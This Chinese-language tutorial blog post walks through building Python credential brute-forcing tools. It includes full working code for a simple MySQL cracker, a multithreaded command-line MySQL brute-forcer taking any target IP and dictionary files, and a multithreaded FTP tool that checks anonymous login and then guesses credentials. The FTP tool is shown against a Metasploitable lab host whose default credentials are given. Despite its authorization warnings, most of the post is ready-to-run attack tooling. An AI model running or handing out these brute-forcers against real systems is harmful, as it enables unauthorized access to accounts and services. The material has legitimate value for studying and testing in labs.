Python开发爆破工具
上一篇讲到了如何用Python开发字典,而当我们手里有了字典 就可以进一步去做爆破的任务了,可以用现成的工具,当然也可以自己写 接下来我就要一步一步来写爆破工具! 爆破MySQL: 想要爆破MySQL目标至少要允许远程连接 我这里没有开启远程连接,只是爆破本地的MySQL 实际上,如果掌握了如何爆破 ......
上一篇讲到了如何用python开发字典,而当我们手里有了字典
就可以进一步去做爆破的任务了,可以用现成的工具,当然也可以自己写
接下来我就要一步一步来写爆破工具!
爆破mysql:
想要爆破mysql目标至少要允许远程连接
我这里没有开启远程连接,只是爆破本地的mysql
实际上,掌握了如何爆破本地 MySQL 之后,远程爆破只是把 host 换成目标 IP 而已。但务必注意:只能对自己拥有或已获得明确授权的目标进行测试,未经授权的爆破是违法行为;而且大量失败登录会在目标日志里留下明显痕迹,也可能触发封禁或锁定策略。
最基本的实现:
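# -*- coding: utf-8 -*-
"""Minimal MySQL credential brute-forcer (ported to Python 3).

Tries every username/password combination from two fixed tuples against a
MySQL server and prints the outcome of each attempt.  Stops at the first
successful login and closes that connection.

Only run this against hosts you own or are explicitly authorised to test;
repeated failed logins are noisy on the target and may trigger lockout or
blocking policies.  Hard-coding target and credentials is only acceptable
for a local experiment like this one.
"""
import pymysql

mysql_username = ('root', 'test', 'admin', 'user')
mysql_password = ('', '123456', 'test', 'root', 'admin', 'xuyiqing', 'user')
success = False
host = "127.0.0.1"
port = 3306

for username in mysql_username:
    for password in mysql_password:
        try:
            # Pass the port explicitly: the original positional call dropped
            # it, so a non-default port was silently ignored.
            db = pymysql.connect(host=host, port=port, user=username, password=password)
        except Exception:
            # pymysql raises OperationalError for bad credentials, but a
            # refused connection or timeout lands here as well, so the
            # message only says "failed", not "wrong password".
            print("用户名:" + username + " 密码:" + password + " 破解失败")
        else:
            db.close()
            success = True
            print("用户名:" + username + " 密码:" + password + " 破解成功")
            break
    if success:
        # No point in guessing further once a valid credential is known.
        break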
在脚本里写死要尝试的用户名、密码以及目标 IP 和端口后直接执行即可。这种把目标和凭据硬编码的写法只适合本地实验;实际使用时应从字典文件读取,并且只针对已获授权的主机运行。
进阶的 MySQL 爆破脚本:写得比较完整,支持多线程。写多线程爆破时有两点要特别注意:一是不要对每一个用户名/密码组合都新建线程而不设上限,字典稍大就会同时打开成千上万个连接,对目标和本机压力都很大;二是 optparse 默认已占用 `-h/--help`,若想用 `-h` 指定目标主机,必须关闭自动帮助选项,否则脚本一启动就会报 OptionConflictError。
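# -*- coding: utf-8 -*-
"""
MySQL credential brute-forcer (mysqlcrack2), ported to Python 3.

Usage:
    python mysqlcrack2.py -h [target ip] --u [user dictionary] --p [password dictionary] -p [port]

Operator notes:
  * Only run this against hosts you own or are explicitly authorised to test.
  * Every guess is a full MySQL handshake.  A large dictionary is loud and may
    trip host blocking or account lockout on the target, so concurrency is
    capped at MAX_WORKERS instead of one thread per user/password pair.
  * Success stops further guessing via a shared Event; the original called
    exit() inside the worker thread, which only ends that thread.
"""
import ipaddress
import optparse
import re
import socket
import sys
import threading

try:
    import pymysql
except ImportError:
    # Defer the hard failure to main() so the module stays importable
    # (e.g. for tests of the pure helpers below).
    pymysql = None

# Upper bound on concurrent login attempts.
MAX_WORKERS = 10

result_user = None
result_pass = None
threads = []
# Set once a valid credential is found so remaining workers bail out early.
_found = threading.Event()
# Guards writes to result_user/result_pass from worker threads.
_result_lock = threading.Lock()
# One slot per in-flight login attempt; acquired before a worker is started.
_slots = threading.Semaphore(MAX_WORKERS)


def is_ipv4(host):
    """Return True if *host* is a well-formed dotted-quad IPv4 address.

    Stricter than the original ``\\d{1,3}`` regex, which accepted octets above
    255 and, via re.match, anything that merely *started* with four numbers.
    """
    if not isinstance(host, str):
        return False
    try:
        ipaddress.IPv4Address(host)
    except ValueError:
        return False
    return True


def load_wordlist(path):
    """Return the lines of *path* with line endings stripped.

    Empty lines are kept on purpose: an empty password is a legitimate guess.
    Raises OSError (e.g. FileNotFoundError) for a bad path and TypeError when
    *path* is None, so the caller can report a missing/incorrect dictionary.
    """
    with open(path, 'r', errors='replace') as fh:
        return [line.rstrip('\r\n') for line in fh]


def main():
    """Parse command-line options, validate them and start the brute force.

    optparse reserves ``-h``/``--help`` by default; automatic help is disabled
    and re-added as ``--help`` so that ``-h`` can keep meaning "target host"
    as in the documented usage.  Exits with status 1 on any usage error.
    """
    print("welcome to mysqlcrack2")
    print("author: xuyiqing version:1.0")
    parse = optparse.OptionParser(
        'python %prog -h <target host> --u <users dictionary> --p <password dictionary> -p <port>',
        add_help_option=False)
    parse.add_option('--help', action='help', help='show this help message and exit')
    parse.add_option('-h', dest="target_host", type="string", help='specify the host')
    parse.add_option('--u', dest='user_dic', type='string', help='specify the dictionary for user')
    parse.add_option('--p', dest='pwd_dic', type='string', help='specify the dictionary for passwords')
    parse.add_option('-p', dest='port', type='int', default=3306,
                     help='specify the port (default 3306)')
    (options, args) = parse.parse_args()

    if pymysql is None:
        print("[!] you need to install pymysql module!")
        print("[!] usage:pip install pymysql")
        sys.exit(1)

    target_host = options.target_host
    if not is_ipv4(target_host):
        print("[!] unknown ip\n")
        sys.exit(1)
    if options.user_dic is None or options.pwd_dic is None:
        print("[!] both --u and --p dictionaries are required\n")
        sys.exit(1)

    mysql_brute(target_host, options.user_dic, options.pwd_dic, options.port)


def mysql_brute(host, user_dic, pwd_dic, port):
    """Try every user/password pair from the two dictionaries against host:port.

    :param host: target IPv4 address
    :param user_dic: path of the username dictionary
    :param pwd_dic: path of the password dictionary
    :param port: MySQL port
    :return: None

    Starts at most MAX_WORKERS concurrent mysql_login() threads and stops
    launching new ones as soon as one succeeds.  Threads are appended to the
    module-level ``threads`` list so the ``__main__`` block can join them.
    """
    print("[*] target:" + host)
    print("[*] start cracking")
    try:
        socket.gethostbyname(host)
    except OSError:
        print('[*] cannot connect to %s' % host)
        sys.exit(1)
    try:
        userlist = load_wordlist(user_dic)
        pwdlist = load_wordlist(pwd_dic)
    except (OSError, TypeError):
        print("[!] the path of the dictionary file is incorrect")
        sys.exit(1)
    print("[*] number of users:" + str(len(userlist)))
    print("[*] number of passwords:" + str(len(pwdlist)))

    for user in userlist:
        for pwd in pwdlist:
            if _found.is_set():
                return
            # Blocks while MAX_WORKERS attempts are in flight; the worker
            # releases the slot in its finally block.
            _slots.acquire()
            t = threading.Thread(target=mysql_login, args=(host, user, pwd, port))
            t.start()
            threads.append(t)


def mysql_login(host, username, password, port):
    """Attempt a single MySQL login and record the credential on success.

    :param host: target host
    :param username: username to try
    :param password: password to try
    :param port: MySQL port
    :return: None

    Runs in a worker thread and always releases its concurrency slot.  A
    refused or timed-out connection prints the same "fail" line as a wrong
    password (the original conflated them too), so check reachability first.
    """
    global result_user, result_pass
    try:
        if _found.is_set():
            return
        try:
            db = pymysql.connect(host=host, port=port, user=username,
                                 password=password, connect_timeout=10)
        except Exception:
            print("[-] fail! user:" + username + " password:" + password + "\n")
            return
        db.close()
        print("[+] success! user:" + username + " password:" + password + "\n")
        with _result_lock:
            result_user = username
            result_pass = password
        _found.set()
    finally:
        _slots.release()


if __name__ == '__main__':
    main()
    for thread in threads:
        thread.join()
    if result_user is not None and result_pass is not None:
        print("[+] result: %s - %s" % (result_user, result_pass))
    if result_user is None and result_pass is None:
        print("[+] crack fail")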
ftp破解工具开发:
实际去安装一些ftp软件比较困难,我这里就用metasploitable linux
启动后默认开启ftp服务,我这里的ip是192.168.232.129
Metasploitable Linux 的 FTP 允许匿名登录,并且已知一个账号密码为 msfadmin/msfadmin(这是故意留有漏洞的靶机,仅用于本地练习)。
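# -*- coding: utf-8 -*-
"""FTP anonymous-login check and credential brute-forcer (Python 3 port).

Only use this against hosts you own or are explicitly authorised to test.
Every guess is a full FTP session, which is easy to spot in the target's
logs and may trip lockout or fail2ban-style blocking.
"""
import optparse
import ftplib
import socket
import sys
import threading

# Cap on concurrent login attempts; the original started one thread per
# user/password pair with no limit and never joined them.
MAX_WORKERS = 10
FTP_PORT = 21
FTP_TIMEOUT = 10

# (username, password) pairs that logged in successfully, filled by workers.
found_credentials = []
_results_lock = threading.Lock()
_slots = threading.Semaphore(MAX_WORKERS)


def anony_login(host):
    """Try an anonymous FTP login on *host*, print the result, return True/False.

    :param host: target host
    :return: True if anonymous login and LIST succeeded, else False

    A bare ``FTP()`` plus one ``connect()`` is used; the original connected
    twice (once in the constructor, once via ``connect()``), leaking the
    first socket.  ``close()`` in ``finally`` is safe even after a failed
    connect.
    """
    ftp = ftplib.FTP()
    try:
        ftp.connect(host, FTP_PORT, timeout=FTP_TIMEOUT)
        ftp.login('anonymous', 'test@qq.com')
        ftp.retrlines('LIST')
    except ftplib.all_errors:
        print("\n[-]" + str(host) + " ftp anonymous login fail")
        return False
    else:
        print("\n[*]" + str(host) + " ftp anonymous login success")
        return True
    finally:
        ftp.close()


def ftp_login(host, username, password):
    """Attempt one FTP login in a worker thread and record it on success.

    :param host: target host
    :param username: username to try
    :param password: password to try
    :return: None

    Authentication failures and connection errors are both swallowed, as in
    the original, so a wrong password and an unreachable host look the same
    here; run anony_login()/a connectivity check first.  Always releases its
    concurrency slot.
    """
    try:
        print("[-] trying: " + username + "-" + password + "\n")
        ftp = ftplib.FTP()
        try:
            ftp.connect(host, FTP_PORT, timeout=FTP_TIMEOUT)
            ftp.login(username, password)
            ftp.retrlines("LIST")
        except ftplib.all_errors:
            return
        finally:
            ftp.close()
        print("success! " + username + " - " + password)
        with _results_lock:
            found_credentials.append((username, password))
    finally:
        _slots.release()


def credential_pairs(users, passwords):
    """Yield (user, password) pairs: every password for each user, in order.

    Line endings (``\\n`` and ``\\r\\n``) are stripped from both sides; empty
    strings are kept because an empty password is a legitimate guess.  Pure
    helper extracted from brute_force() so the guess order is testable.
    """
    pwds = [p.rstrip('\r\n') for p in passwords]
    for user in users:
        user = user.rstrip('\r\n')
        for pwd in pwds:
            yield user, pwd


def brute_force(host, users_file, pwds_file):
    """Try every user/password pair from the two dictionary files against host.

    :param host: target host
    :param users_file: path of the username dictionary
    :param pwds_file: path of the password dictionary
    :return: None

    Both files are read once and closed (the original re-read the password
    file per user via seek(0) and never closed either).  At most MAX_WORKERS
    attempts run concurrently and all workers are joined before returning,
    so found_credentials is complete when this returns.
    """
    with open(users_file, 'r', errors='replace') as uf, \
            open(pwds_file, 'r', errors='replace') as pf:
        users = uf.readlines()
        pwds = pf.readlines()

    workers = []
    for username, password in credential_pairs(users, pwds):
        # Blocks while MAX_WORKERS attempts are in flight; released by the worker.
        _slots.acquire()
        t = threading.Thread(target=ftp_login, args=(host, username, password))
        t.start()
        workers.append(t)
    for t in workers:
        t.join()


def main():
    """Parse options, resolve the host, check anonymous login, then brute force.

    optparse reserves ``-h``/``--help``; automatic help is disabled and
    re-added as ``--help`` so ``-h`` can mean "target host" as documented
    (otherwise optparse raises OptionConflictError at startup).  Exits with
    status 1 on missing options or an unresolvable host.
    """
    parser = optparse.OptionParser(
        'usage: %prog -h <target host> -u <users dictionary> -p <password dictionary>',
        add_help_option=False)
    parser.add_option('--help', action='help', help='show this help message and exit')
    parser.add_option('-h', dest='target_host', type='string', help='specify the host')
    parser.add_option('-u', dest='user_dic', type='string', help='specify the dictionary for user')
    parser.add_option('-p', dest='pwd_dic', type='string', help='specify the dictionary for passwords')
    (options, args) = parser.parse_args()
    host = options.target_host
    user_dic = options.user_dic
    pwd_dic = options.pwd_dic
    if host is None or user_dic is None or pwd_dic is None:
        parser.print_usage()
        sys.exit(1)
    try:
        socket.gethostbyname(host)
    except OSError:
        print('[*] cannot resolve %s unknown host' % host)
        sys.exit(1)
    anony_login(host)
    brute_force(host, user_dic, pwd_dic)
    if found_credentials:
        for user, pwd in found_credentials:
            print("[+] result: %s - %s" % (user, pwd))
    else:
        print("[+] no valid credentials found")


if __name__ == '__main__':
    main()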
使用的话,需要两个字典:用户字典和密码字典,我随便加入一些东西
username.txt
root user admin msfadmin manager
password.txt
pwd password userpass msfadmin manager 123456
实际使用:`-h` 指定目标 IP,`-u` 指定用户名字典,`-p` 指定密码字典。
结果:上面已经检测到目标允许匿名登录,原文截图中还显示出 msfadmin/msfadmin 这组凭据,说明破解成功。